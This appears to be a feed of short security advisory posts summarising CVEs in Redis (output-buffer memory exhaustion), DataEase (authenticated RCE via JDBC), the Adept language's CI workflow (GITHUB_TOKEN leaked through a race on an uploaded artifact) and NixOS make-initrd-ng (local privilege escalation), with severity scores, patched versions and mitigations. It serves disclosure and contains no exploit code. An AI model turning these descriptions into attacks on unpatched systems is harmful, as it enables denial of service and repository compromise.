Redis is an open source, in-memory database that persists on disk. In versions starting at 2.6 and prior to 7.4.3, An unauthenticated client can cause unlimited growth of output buffers, until the server runs out of memory or is killed. By default, the Redis configuration does not limit the output buffer of normal clients (see client-output-buffer-limit). Therefore, the output buffer can grow unlimitedly over time. As a result, the service is exhausted and the memory is unavailable. When password authentication is enabled on the Redis server, but no password is provided, the client can still cause the output buffer to grow from "NOAUTH" responses until the system will run out of memory. This issue has been patched in version 7.4.3. An additional workaround to mitigate this problem without patching the redis-server executable is to block access to prevent unauthenticated users from connecting to Redis. This can be done in different ways. Either using network access control tools like firewalls, iptables, security groups, etc, or enabling TLS and requiring users to authenticate using client side certificates.

https://nvd.nist.gov/vuln/detail/CVE-2025-21605

Post-auth RCE in DataEase.

https://github.com/dataease/dataease/security/advisories/GHSA-h7hj-4j78-cvc7

sev:HIGH 8.2 - CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

DataEase is an open-source BI tool alternative to Tableau. Prior to version 2.10.8, authenticated users can complete RCE through the backend JDBC link. This issue has been patched in version 2.10.8.

https://nvd.nist.gov/vuln/detail/CVE-2025-32966

This is kind of a neat race condition:

https://github.com/AdeptLanguage/Adept/security/advisories/GHSA-8c7v-vccv-cx4q

sev:CRIT 9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Adept is a language for general purpose programming. Prior to commit a1a41b7, the remoteBuild.yml workflow file uses actions/upload-artifact@v4 to upload the mac-standalone artifact. This artifact is a zip of the current directory, which includes the automatically generated .git/config file containing the run's GITHUB_TOKEN. Seeing as the artifact can be downloaded prior to the end of the workflow, there is a few seconds where an attacker can extract the token from the artifact and use it with the Github API to push malicious code or rewrite release commits in the AdeptLanguage/Adept repository. This issue has been patched in commit a1a41b7.

https://nvd.nist.gov/vuln/detail/CVE-2025-32958

Security Advisory: Local privilege escalation in make-initrd-ng (CVE-2025-32438)

https://discourse.nixos.org/t/security-advisory-local-privilege-escalation-in-make-initrd-ng-cve-2025-32438/63315

#security #nixpkgs #nixos